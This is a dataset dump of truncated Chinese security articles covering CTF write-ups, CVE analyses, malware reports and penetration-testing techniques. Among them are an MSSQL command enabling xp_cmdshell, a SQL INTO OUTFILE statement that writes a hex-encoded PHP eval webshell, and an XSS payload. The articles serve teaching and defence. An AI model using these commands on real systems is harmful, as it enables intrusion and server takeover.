text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
背景:
在企业安全中,比较基础的一块就是:资产漏洞管理;
巡风可以用来做这件事,当然某些地方需要根据自己实际情况修改、增加,这里不赘述;
其数据库为mongo;
在初步使用过程中,为了方便后续的开发,需要使用pycharm集成的mongo可视化插件,
这其中我们遇到了一些"不使用默认端口的坑",解决过程也很蛋疼,花费了3、4天吧,断断续续,有些东西还是可以记录一下的;(粗浅学习,大佬们一笑而过,能指点一下最好不过)
遇到两个问题:1、无法shell连接数据库,mongo报错,
指定使用的端口也没用
2、pycharm的mongo插件无法连接,mechanism尝试default,报错如下
看到支持的机... | 社区文章 |
### 总结:
有关挑战的简要概述,您可以查看以下图像:
下面我将详细介绍我为解决CTF而采取的每一步,以及在某些情况下导致我走向死胡同的所有错误假设。
### Twitter
CTF从这条tweet开始:
这些二进制是什么?
我的第一个想法是尝试解码图像上的二进制。我还注意到在'_'字符后,二进制数字与前面的相同,即:
01111010 01101100 01101001 01100010 00101011 01111000 10011100 01001011 11001010 00101100 11010001 01001011 11001001 11010111 11001111 00110000 0010... | 社区文章 |
漏洞挖掘
在一次渗透测试过程中,对主站进行漏洞挖掘无果后,对子站进行挖掘。
在子站发现mssql注入漏洞
Getshell
一、发现360
用1=(select
is_srvrolemember('sysadmin'))和host_name()!=@@servername判断出权限为sa权限,且站库分离,写不了webshell。然后用sqlmap跑os-shell,发现执行命令无效。
使用EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure
'xp_cmdshell',1 RECONFIGURE;尝试开启xp_cmdshell依旧无... | 社区文章 |
## 0x00 前言
续上篇文的初探weblogic的T3协议漏洞,再谈CVE-2016-0638, CVE-2016-0638是基于 CVE-2015-4852漏洞的一个绕过。
[Java安全之初探weblogic T3协议漏洞](https://www.cnblogs.com/nice0e3/p/14201884.html)
## 0x01 环境搭建
### 补丁环境搭建
这里采用上次的weblogic环境,但是在这里还需要打一个补丁包,来修复 CVE-2015-4852漏洞后,对该漏洞进行一个绕过。
CVE-2015-4852的修复补丁为`p21984589_1036_Generic`,由于在互联网上并没有找到该补丁包,只能通... | 社区文章 |
# 【知识】5月16日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要: nmap发布检测smb-vuln-ms17-010的脚本、利用Google
chrome窃取windows凭证、通过IE11浏览器跨域窃取csv的信息、上周windows杀毒引擎的RCE的详细分析、Empire
2.0最终版发布、XML vs. JSON: 常见用法和安全性比较、The STRESS(Search Text RElevance Score Side-channel) Attack** ****
**
**
**资讯类:**
* * *
维基解密公布... | 社区文章 |
本人在做堆题时经常遇到一些思路特别怪的套路,自己不看 exp 基本永远想不到,看完后先是一脸蒙,经过调试就恍然大悟.奥~~
还能这么玩,所以通过这个系列记录一下
在 fastbin 中,大多数时候修改成可利用的 fd
很考验堆的构造能力,下边就以[该题](https://xz.aliyun.com/t/3383#toc-4)作为模板(题有点古老了,但这确实是我找的最合适的题目)
## 漏洞简要分析及unlink exp
师傅已经说的很清楚了,咱就直接分析漏洞吧
unsigned __int64 take_note()
{
int v1; // [rsp+4h] [rbp-Ch]
unsigne... | 社区文章 |
**作者:Phith0n@长亭科技**
**来源:[https://www.leavesongs.com/PENETRATION/when-imagemagick-meet-getimagesize.html?from=timeline&isappinstalled=0](https://www.leavesongs.com/PENETRATION/when-imagemagick-meet-getimagesize.html?from=timeline&isappinstalled=0)**
前段时间写的文章,在微博上说HW结束分享一下,总算可以发了。感谢 @voidfyoo 提出的这个问题。
今天遇到一个代码,大致如下:
... | 社区文章 |
# 【补丁分析】CVE-2016-8610:对导致拒绝服务的“SSL Death Alert”漏洞补丁分析
|
##### 译文声明
本文是翻译文章,文章来源:securingtomorrow.mcafee.com
原文地址:<https://securingtomorrow.mcafee.com/mcafee-labs/ssl-death-alert-cve-2016-8610-can-cause-denial-of-service-to-openssl-servers/>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:**[ **m6aa8k**
****](http://bobao.360.cn/membe... | 社区文章 |
# 浅析SSRF原理及利用方式
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
##
## 漏洞简介
SSRF(Server-side Request Forge, 服务端请求伪造)
通常用于控制web进而探测内网服务以及攻击内网脆弱应用
即当作跳板机,可作为 **ssrfsocks** 代理
## 漏洞产生
由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制。
## 举个栗子
<?php
/**
* Check if the 'url' GET variable is set
* Example - http://localhost/... | 社区文章 |
# 目标
1.样本鉴定黑白
2.样本初步行为的判断
3.相关信息收集
# 原理
## 鉴黑白
### 特征码检测
**检测已知病毒** :通常杀毒软件将分析过的病毒中的特征部分提取成相应特征码(文件特征、字符特征、指令特征等)
### 启发检测
**检测未知病毒** :检测病毒运行过程中的API调用行为链。
## 初步型为判断
### 特征API
不同种类的病毒样本根据其特性总会调用一些特定的API函数
## 相关信息收集
* 编译时间:可以判断样本的出现的时间
* 文件类型:哪类文件,命令行或者界面或者其他
* 是否有网络行为
* 是否有关联文件
* 壳情况
# 算法流程
根据常用逆向工具来实现上述原理的检测
... | 社区文章 |
**Author:mengchen@Knownsec 404 Team**
**Chinese version:<https://paper.seebug.org/1048/>**
## 1\. Introduction
I recently studied BlackHat's topic, and one of the topics - "HTTP Desync
Attacks: Smashing into the Cell Next Door" has caused me great interest. The
author talks about the HTTP smuggling attack and shares ... | 社区文章 |
翻译自:<https://medium.com/@0xHyde/cookie-based-self-xss-to-good-xss-d0d1ca16dd0e>
翻译:聂心明
上个月我收到来自Synack团队的私有赏金任务,最后我在网站中发现了一个反射型xss。因为这是私有赏金任务,我不能在writeup中提到目标的信息。但是我会演示我是怎样绕过各种限制的。我最后得到了$272,因为我没有证明我能访问dom对象。因为网站限制了圆括号,所以我不能访问到dom,并且我不能执行像下面这样的payload:
alert(document.domain)
正常情况下,上面的JavaScript代码执行后会有下面截图中的效果
... | 社区文章 |
# 密码学学习笔记 之 knapsack problem
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
ACM中的背包问题是一种组合优化的NP完全问题,而在密码学中,也有对背包问题的应用。
## Subset-sum problems and knapsack cryptosystems
密码学中的利用knapsack
problem的加密。大意就是,你公开一个序列,然后你把你的消息转为二进制,如果你消息的这一位是1,就从你序列中取出对应位置的值,最后密文就是你所有取出的值的和。
但是这样就产生一个问题,加密是加过去了。那该怎么解密呢?
蛮力攻击的时间复杂度是O(2^n),就算中途相遇也只能... | 社区文章 |
翻译自: <https://access.redhat.com/blogs/766093/posts/3135411>
翻译: 聂心明
Java反序列化漏洞已经是过去两年安全圈里面最热的流行词了,因为每一个使用原始java序列化的框架都会受到反序列化攻击。一开始,还有很多不同的方法去试图解决这个问题的。(
<https://github.com/kantega/notsoserial> ,<https://github.com/Contrast-Security-OSS/contrast-rO0> , <https://github.com/mbechler/serianalyzer>
)。这篇文章着重讲java反序列化漏洞和解... | 社区文章 |
# 利用INF-SCT获取并进行绕过、规避和持久化技术
|
##### 译文声明
本文是翻译文章,文章原作者 BOHOPS,文章来源:bohops.com
原文地址:<https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
两周前,我发布了几个利用INF文件(.inf)来“获取并执行”远程脚本组件文件(.sct)的“pass-thru”技术。通常,这些方法的实例可能会被滥用,以绕过应用程序白名单(AWL)策... | 社区文章 |
### 概述
这篇Paper深入研究了 Windows 10下的Pass-the-Hash攻击:
本文分析了PtH攻击在windows 10 v1903环境下的可行性。
本文展示了几种hash提取技术。
本文演示了在哪些情况下攻击者可以使用这些hashes进行身份验证(各种协议下执行PtH攻击的条件和方法)。
本文说明了一个企业可以考虑使用的"安全管控"(security controls)措施,可以最大程度降低PtH攻击的风险。
最终,做了的这些测试证明了PtH攻击仍然是一个真正的威胁,每个企业都需要直面这种风险。
### 意义
* 研究Pass-the-Hash攻击的意义:
* 1.有助于已授权的渗透... | 社区文章 |
# BenignCertain:一款可以远程提取思科VPN密钥的黑客工具(含泄漏文件下载地址)
|
##### 译文声明
本文是翻译文章
原文地址:<https://musalbas.com/2016/08/18/equation-group-benigncertain.html>
译文仅供参考,具体内容表达以及含义原文为准。
**
**
**一、前言**
一转眼,我们又来到了这个熟悉又陌生的星期五了。在过去的这一周,网络安全领域中最“吸睛”的事件肯定非“NSA被黑事件”莫属了。美国时间2016年8月15日,一个名为“The
Shadow
Brokers”的黑客组织泄漏了大量黑客工具,并且他们还声称这些黑客工具是由美国国家安全局... | 社区文章 |
### 0x00 记忆方式
> case when 15 like '1%' then 0 else 2*1e308 end
### 0x01 前言
在一次日常的web安全检测时发现的一个sql注入,刚开始是直接扔sqlmap里面的,后面发现sqlmap对于这个站是怎么样都无法正常的检测注入
如下图:
而手工检测是可以注入但是人家返回的是你输入的内容,也就是不会有数据库的数据返回
这就很蛋疼了,并且通过这个网站的一处输入与输出的地方,我还知道了,他会全局把
`(` `)`过滤为`[` `]`这就说明我们注入的时候是没有函数可以给我们使用的,也解释了为什么sqlmap会检测不出来。
如下图:
好了前言介绍完了,剩下的就... | 社区文章 |
## 方案背景
对于网络服务程序的模糊测试,当前的解决方案主要有:hook libc
socket调用、修改afl、修改网络程序等,其中无论哪种方式,几乎都需要修改网络服务程序。
AFLplusplus的开发者在仓库中推荐使用[hook
socket](https://github.com/AFLplusplus/AFLplusplus/tree/stable/utils/socket_fuzzing)
的方案,这种方案灵感来源于[preeny](https://github.com/zardus/preeny)。基于 `LD_PRELOAD` hook
libc中socket相关的函数将网络流转换为标准输入的IO,但是这种方案在一... | 社区文章 |
作者:启明星辰ADLab
#### 一、威胁概述
近期,思科Talos团队因情况紧急提前公开了一项未完成的研究,该研究提及了一个可能对全球网络产生重大危害的高级威胁攻击(大约有50万台设备受到感染),由于其核心模块文件为VPNFilter,故该恶意代码也被命名为”VPNFilter”。该攻击是一起以入侵物联网为载体从事可能由国家发起的全球性的高级恶意软件攻击,恶意软件通过三个阶段来部署其攻击武器,目前已经有至少50万台设备受到感染。攻击者利用该恶意软件来控制并监视处于工控网络、办公环境中的网络设备(包含路由器、网关、防火墙以及其他的物联网设备),其支持工控网络情报收集、重要敏感的流量(登录凭证)截取、流量篡改、定向JS注入、设备破坏... | 社区文章 |
# 企业内网中的横向移动
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。
中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。
近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。
本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击者视角还原“横向移... | 社区文章 |
本文翻译自:<https://researchcenter.paloaltonetworks.com/2018/07/unit42-decrypting-lockcrypt-ransomware/>
* * *
LockCrypt,也叫EncryptServer2018,是2017年中发现的勒索软件家族,至今仍然活跃。网络上没有公开的LockCrypt的解密方法。恶意软件的变种已经使用了更强的加密方法,本文对旧版恶意软件的解密进行分析。
# 初始分析
研究人员发现恶意软件作者用一些看起来弱加密的定制加密方法来加密文件,这让研究人员很惊讶,在2018年居然遇到了勒索软件使用定制的加密模型,如果使用Windows
API来加密数据的方式... | 社区文章 |
# 独角兽暑期训练营 | 嵌入式固件自动化漏洞扫描方法研究
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 该课题由独角兽安全夏令营第二届学员黄瑞同学完成
## 独角兽暑期训练营
360无线电安全研究院每年暑假都会面向在校学生举办一次暑期训练营,申请者投递简历并提交自己想做的课题介绍后,若入选,会在360技术专家的指导下完成课题。
本系列文章会发布今年5位学员在训练营中的成果。文章相关代码后续会在[训练营github代码仓库](https://github.com/UnicornTeam/summer-camp)发布 。
## 引言
从骨干路由器、交通信号灯到家用调制解调器和智能冰箱,嵌入式设... | 社区文章 |
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
# 3.CSRF
## 1.CSRF(跨站请求伪造)概述
CSRF(跨站请求伪造)概述
Cross-site request forgery
简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one
click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。
这里列举一个场景解释一下,希望能够帮助你理解。
场景需求:
小黑想要修改大白在购物网站tianxiewww.xx... | 社区文章 |
# Android逆向:基础入门
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
随着app的广泛应用,使用过程中,难免会遇到些很不友好的功能,比如:游戏充值、间断性弹窗广告、续费解锁下一回等等。
如何将这些功能给XX掉?Android逆向就可以做到,纵向丝滑。
当然这只是安卓逆向的 **非专业性作用** 之一,安卓逆向的作用不仅限于此,之所以以此引入,是因为激发学习最大的动力——兴趣,有了兴趣,你们想不学都不行。
网上教程上都这样讲,学习安卓逆向,不可避免的需要掌握一定的java基础、等等这就话虽说没错,但对于零基础的小白,难道要先学这些编程语言再去入手逆向吗?
我的想法是,采用理论... | 社区文章 |
**作者:leveryd
原文链接:<https://mp.weixin.qq.com/s/mnHGLZ_e3tWkxCL-DPAAvQ>**
# 背景
以前挖国内src时的一个套路:
通过"寻找管理后台 + 寻找api接口 + burp验证api接口"来找未授权api
找到未授权api后,根据api功能就能造成不同危害:
* 比如利用"重置密码接口"来重置管理员密码,然后登陆后台
* 比如利用"查数据接口"获取数据
个人觉得这个套路比较好用,原因在于:
* 没有攻击payload,waf、nids等安全设备比较难检测(虽然可能按照访问404频率和比例等特征封禁)
* "管理后台对外开放"和"api接口未授权访问... | 社区文章 |
# pcap workshop Learning Part 1
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
链接:<https://pan.baidu.com/s/1rH2jLScXAFST8OXDd_C6ng>
提取码:anq6
## 2017-03-25-traffic-analysis-exercise
打开流量包,看到了http的流量。我们其实能直接去看http流量的。但是还是先通过三板斧来分析该流量包吧。
存在dns,tcp,http,tls协议。
在对话中的tcp中发现了异常多的Packets
那么我们跟进并追踪一下这个tcp流(这里为什么要这么麻烦的去看这些东西呢,以为这个... | 社区文章 |
# 007黑客组织及其地下黑产活动分析报告
|
##### 译文声明
本文是翻译文章,文章来源:360追日团队
译文仅供参考,具体内容表达以及含义原文为准。
摘 要
²最早可以追溯到2007年开始进行制作并传播恶意代码等互联网地下产业链活动,一直活跃至今。
²制作并传播的Hook007类样本HASH数量达到17万个,相关恶意代码云查询拦截次数达到1.3亿次,相关恶意代码主要以后门和盗号程序为主。
²主要针对中国用户,累计受影响用户超过千万,单就Hook007家族统计近一年被感染用户达到50万。
²相关初始攻击主要依托即时通讯工具(QQYY等)采用社会工程学方法进行对特定对象进行攻击;相关攻击对象主要为网络游戏玩家等普通网民,另外对教... | 社区文章 |
之前都是 ysoserial 一把梭, 还是得学习 + 复现一下内部实现机制的. 主要是对常见的 URLDNS 和
CommonsCollections1-7 这些利用链进行了分析, 相信看完理解其他利用链也不在话下.
## URLDNS
最简单的一个, 这个成因就是 `java.util.HashMap` 重写了 `readObject`, 在反序列化时会调用 `hash` 函数计算 key
的 hashCode.
而 `java.net.URL` 的 hashCode 在计算时会调用 `getHostAddress` 来解析域名, 从而发出 DNS 请求.
可以理解为, 在序列化 HashMap 类的对象时, 为了减小序列化后的... | 社区文章 |
# 【木马分析】使用高级反调试与反HOOK的安卓恶意ROOT软件的深度分析(一):NATIVE层的调试
|
##### 译文声明
本文是翻译文章,文章来源:fortinet.com
原文地址:<https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[ **shinpachi8**
****](http... | 社区文章 |
# 【技术分享】基于nmap扫描结果的端口爆破工具:BrutesPray
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
大家搞内网或者C段渗透测试的时候可能遇到很多时候需要对大批的主机进行精确爆破,这时候 **BruteSpray** 就派上用场了。
BruteSpray是一款基于nmap扫描输出的gnmap/XML文件.自动调用Medusa对服务进行爆破(Medusa美杜莎
是一款端口爆破工具,速度比Hydra九头蛇快)。
BruteSpray甚至可以通过Nmap –sV参数的扫描找到非标准端口。
**使用方法非常简单:**
先上nmap做一个扫描,并且用nmap的-oG... | 社区文章 |
# 【技术分享】一篇文章精通PowerShell Empire 2.3(上)
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
作者:[shuteer](http://bobao.360.cn/member/contribute?uid=1268998211)
预估稿费:700RMB
(本篇文章享受双倍稿费 活动链接请[点击此处](http://bobao.360.cn/news/detail/4370.html))
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.cn/... | 社区文章 |
# 摩诃草APT组织针对我国敏感机构最新的网络攻击活动分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
摩诃草组织(APT-C-09),又称HangOver、VICEROY TIGER、The Dropping
Elephant、Patchwork,是一个来自于南亚地区的境外APT组织,该组织已持续活跃了8年。摩诃草组织最早由Norman安全公司于2013年曝光,该组织主要针对中国、巴基斯坦等亚洲地区和国家进行网络间谍活动。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击。
在2018年春节前后,360威胁情报中心与360安全监测与响应中心协助用户处理了多起非常... | 社区文章 |
作者: Ivan1ee@360云影实验室
# 0X00 前言
Newtonsoft.Json,这是一个开源的Json.Net库,官方地址:<https://www.newtonsoft.com/json>
,一个读写Json效率非常高的.Net库,在做开发的时候,很多数据交换都是以json格式传输的。而使用Json的时候,开发者很多时候会涉及到几个序列化对象的使用:DataContractJsonSerializer,JavaScriptSerializer
和
Json.NET即Newtonsoft.Json。大多数人都会选择性能以及通用性较好Json.NET,这个虽不是微软的类库,但却是一个开源的世界级的Json操作类库,从下面... | 社区文章 |
# 【CTF攻略】百度杯2月第三周Reverse专题writeup
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**Reverse-1 project1**
* * *
**by 渡师傅**
运行一下,看到Input the
flag:,本着去找这个字符串的想法,在ida里找,可惜没找到,但有别的发现BCDFGHJKMPQRTVWXY2346789,凭经验可以推出,这个字符串有问题,跟到他调用的位置sub_404820
char sub_404820()
{
int v0; // esi@1
unsigned int v1... | 社区文章 |
# 【技术分享】钓鱼新姿势:细谈如何构建自己的基础认证钓鱼页面
|
##### 译文声明
本文是翻译文章,文章来源:securitycafe.ro
原文地址:<https://securitycafe.ro/2017/09/06/phishy-basic-authentication-prompts/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[blueSky](http://bobao.360.cn/member/contribute?uid=1233662000)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**前言**
在我们之前的一篇文章中,我们介绍了一款非常受黑... | 社区文章 |
**作者:崎山松形@RainSec**
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
## 前言
最近在搞Iot的时候接触到Qiling框架,用了一段时间后感觉确实模拟功能挺强大的,还支持Fuzz,于是开始学习对Iot
webserver这样的程序进行Fuzz。
官方给出了类似的例子如Tenda AC15 的httpd的fuzz脚本,但是也就光秃秃一个脚本还是需要自己来一遍才能学到一些东西;因为面向的是Iot
webserver的Fuzz因此需要对嵌入式设备中常用web开源框架有一些了解,这里是对于Boa框架的fuzz案例。
**环境准备** ... | 社区文章 |
原文链接: <https://blog.sheddow.xyz/css-timing-attack/>
作者:sheddow
你有没有遇到过运行jQuery(location.hash)的网站?看似相当无害,对吧?
location.hash始终以“#”开头,因此所有这些代码都会执行CSS查询选择器。事实证明,这就足以执行时序攻击,这种攻击可以从HTML中提取几乎任何秘密字符串。
让我们从基础开始讲起。 CSS选择器用于匹配和选择HTML元素,如下所示:
div,a[href],input[name=authenticity_token].
如果使用CSS3,你就可以拥有更复杂的选择器,例如可以用input[value^='x']来... | 社区文章 |
# 【技术分享】物联网设备的固件分析技术
|
##### 译文声明
本文是翻译文章,文章来源:attify
原文地址:<http://blog.attify.com/2016/07/08/firmware-analysis-iot-devices/>
译文仅供参考,具体内容表达以及含义原文为准。
**翻译:**[ **shan66**](http://bobao.360.cn/member/contribute?uid=2522399780)
**预估稿费:250RMB(不服你也来投稿啊!)**
********投稿方式:发送邮件至**[ **linwei#360.cn**](mailto:linwei@360.cn) **,或登陆... | 社区文章 |
在渗透测试的时候,我们使用into outfile快速写入一句话后门时经常会出现写入不了的情况:
update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F70687020406576616C28245F504F53545B2778275D293B3F3E)
into outfile '../webroot/xxxxxx.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;
不... | 社区文章 |
# 一、基础概念
## 1.1 概念
域名系统(Domain Name System,DNS)是互联网的一项基础服务,默认端口53,可以实现域名和IP地址的相互映射,其数据库分散在全球多地。
## 1.2 协议
DNS默认使用UDP协议通信,但是由于UDP的报文长度限制为512字节,当DNS请求超过此长度时会自动使用TCP协议发起请求。
## 1.3 域名层次
DNS(或者说域名)是划分层次的,它有根域(Root Doamin)、顶级域(Top Level Domain,TLD)、二级域(Second Level
Domain,SLD)等级别,如下图以www.baidu.com介绍其层级,其中根域是一个点,只是默认情况下都不再输入了... | 社区文章 |
# Tenda AX12路由器设备分析(二)之UPnP协议
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
在智能设备和家庭网络路由设备中,最常见的协议是UPnP协议,因此本篇文章将以最新的Tenda
AX12路由器设备为支点,对UPnP协议由浅入深的讲解和如何在平时对UPnP服务进行分析和测试
## 0x02 UPnP 介绍
UPnP 是通用即插即用(Universal Plug and
Play)服务的缩写,它是发现网络上各种设备提供的服务并于之交互的一种标准,现在越来越多的智能服务设备和家用网络的发展,为了使不同的智能设备之间进行网络互联互通,因此UPnP目前是家庭... | 社区文章 |
# 12月11日安全热点 - Janus漏洞PoC/Apache Synapse代码执行漏洞
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类
Janus漏洞(CVE-2017-13156): 修改安卓app而不影响签名
<https://www.anquanke.com/post/id/89979>
https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures
PoC:<https://githu... | 社区文章 |
# 【缺陷周话】第16期:资源未释放:流
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
代码质量作为软件产品的非功能性质量是衡量软件产品的一项隐性指标。重复的代码会造成维护成本的增加,不规范的代码、不良注释和复杂度过高的代码会增加阅读和理解代码的难度。代码质量重视代码细节,例如常见的使用常量调用equals(),过大的内存分配,循环创建对象引用,流资源、数据库连接、同步锁资源未释放等。其中“资源未释放:流”是指程序创建或分配流资源后,不进行合理释放。尤其是多次创建资源未释放会占用系统开销,影响程序性能。本篇文章以
JAVA 语言源代码为例,分析“资源未释放:流”产生的原因以及修复方法。 详细请参... | 社区文章 |
# 一.概述
1.1某天,一位网上朋友告诉笔者,他被骗了。被骗方式很独特,因为自己没钱所以选择贷款,在贷款过程中惨遭诈骗。
1.2诈骗短信:
1.3诈骗过程(此处受害者用小辉代替):
某日,小辉手机收到一条关于网络贷款的短信,恰逢月底,捉襟见肘,小辉没忍住诱惑下载打开了app。注册好账号,填写好身份证号、手持、工作地点、家人信息等后申请了20000元贷款,但是迟迟没到账,小辉询问客服得知:亲,这边申请贷款需要先缴纳688的VIP费用哦,缴纳后VIP费用会连同贷款金额一起打款到您的银行卡账户。小辉想了想,也不亏,于是将下个月房租开通了VIP待遇。
小辉开通了VIP待遇,以为就能顺利贷款度过月底,但是还是没收到贷款金额以及V... | 社区文章 |
# Chrome Issue 659475(CVE-2016-5168)漏洞分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
Issue 659475的漏洞利用过程非常巧妙,结合了String(null)对象完成漏洞利用。本文将介绍这个巧妙的过程。
## 0x01 前置知识
### String对象结构
在V8中,`String`对象其实就是`JSValue`对象,而决定`JSValue`的值的关键就是它的`value`字段。
使用如下代码进行调试
var str = new String("aaaaaaaaaaaaaaa");
var str2... | 社区文章 |
**作者:知道创宇404实验室 kuipla、Billion
时间:2022年05月10日**
2022/5/4日F5官方发布一个关于BIG-IP的未授权RCE(CVE-2022-1388)安全公告,官方对该漏洞的描述是`Undisclosed
requests may bypass iControl REST
authentication.`,修复方式中提到了低版本可以将非`Connection:keep-alive`和`Connection:close`的请求全部关闭。
## 0x00 补丁分析
由于BIG-IP的框架依旧有大佬分析过了,因此我们直接根据去寻找apache的认证服务`mod_pam_auth.so`以及`mg... | 社区文章 |
# TCTF2021-0VM-考验输入的构造
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 题目附件下载
链接: <https://pan.baidu.com/s/1q8zkmKiHVYVJ8OaV4BWHOg> 提取码: llpj
## 程序输入分析
程序实际上通过解析你输入的数据,将其通过一定的算法转化为相关的指令,然后再进行模拟指令的运行,漏洞实际上存在于一些指令的运行中,但是比较麻烦的是构造输入的问题。
其输入的解析函数如下,可见其只需要在你的输入中解析出`v5,v6,v7`还有`choice`,更简化一点其实我们用到的指令只需要`v5,v7`这两个参数。
这些的参数的构造是由... | 社区文章 |
## 0x01 前言
首先Java下的命令执行大家都知道常见的两种方式:
1.使用ProcessBuilder
ProcessBuilder pb=new ProcessBuilder(cmd);
pb.start();
2.使用Runtime
Runtime.getRuntime().exec(cmd)
也就是说上面cmd参数可控的情况下,均存在命令执行的问题。但是话题回来,不太清楚大家是否遇到过java命令执行的时候,无论是windows还是linux环境下,带有`|,<,>`等符号的命令没办法正常执行。所以今天就进入底层看看这两个东西。
## 0x02 差别
先选择跟进`Runtime.getRunt... | 社区文章 |
# 会“说话”的银行木马
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1.概述
恶意软件尤其是银行木马的花招总是日新月异。此前有伪造目标银行的登录界面以窃取登录凭证的Thief Bot,有基于记录键盘输入信息以窃取密钥的 Loki
Bot,有监控用户屏幕并获取用户短信验证消息的Tea
Bot。近期出现了一种名为Fakecalls的新型银行木马,除了常见的隐私窃取功能外,它还可以通过拦截银行与用户之间的通话从而冒充银行员工进行诈骗和窃取。
## 2.样本信息
样本属性 | 样本信息
---|---
样本名称 | KB국민은행
样本包名 | com.hana.activity16... | 社区文章 |
[+] Author: niexinming
[+] Team: n0tr00t security team
[+] From: http://www.n0tr00t.com
[+] Create: 2017-01-10
此次逆向的 apk 为 [tmri_10101_1461033981072_release.apk (pass:
3qun)](https://pan.baidu.com/s/1slcZDDz) ,首先把 apk 安装在模拟器上,然后抓包分析网络流量,把 apk
拖进模拟器中之后安装并设置代理,虽然 app 走的 http 但是抓到的包全是乱码,所以在内部肯定对流量进行了加密操作。
####... | 社区文章 |
**Author: Zhuo Liang**
### Background
XNU supports [Shared Memory](https://en.wikipedia.org/wiki/Shared_memory) for
inter process communication. The kernel provides two kinds of memory-sharing
mechanisms: POSIX shared memory and System V shared memory.
int main( int argc, char** argv ) {
int fd;
uns... | 社区文章 |
1. 得到目标后,先对目标官网进行了一次常规的渗透检测
2. 网站长这个样,看着就很久远的样子,10年前的网站类型
3. 端口扫描了,没有什么利用点,只能从web找入口了
4. 先看看有没有什么漏洞,浏览一下网站
5. 有爆错,但是没有注入
6. 从图片中可以得到的信息
aspx + mysql
7. 指纹识别,无结果
8. 扫描目录,无结果
9. 通过浏览网站发现管理员的账号信息
sysadmin
10. 没有思路了(这还测个屁,出信息泄露的报告吧。。。。。)
11. 吃完午饭回来又打开网站,感觉这么老的网站应该多多少少的会有问题
12. ... | 社区文章 |
# 四道题看格串新的利用方式
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:nuoye@星盟
## 前言
相对于基本的%p进行leak和%n写入,最近几年出现了不少新的格式化字符串的利用方式,这里以四道题为例,讲下四个新的方法。
## 正文
### 2020 ciscn 华南分区赛 : same
这道题主要涉及到到一个比较偏的格串符号`*`,在[wiki](https://zh.wikipedia.org/wiki/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2)中可以看到关于它的用法:
知道这一点,下面的题目也就不难了。... | 社区文章 |
https://hackerone.com/reports/198734
# 概述
在使用精心编制的对象的`__wakeup()`魔术方法进行GMP反序列化时发现了一个类型混淆漏洞,该漏洞可被滥用来更新分配给已创建对象的任何属性,进而触发严重的安全问题。
# 受影响的版本
PHP 5.6 < 5.6.30
# 漏洞披露
此漏洞由Taoguang Chen披露
# 漏洞描述
gmp.c
static int gmp_unserialize(zval **object, zend_class_entry *ce, const unsigned char *buf, zend_uint buf_len, zend_unserial... | 社区文章 |
# 隐私泄露警告:请停止使用”微信清理僵尸粉“软件!
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
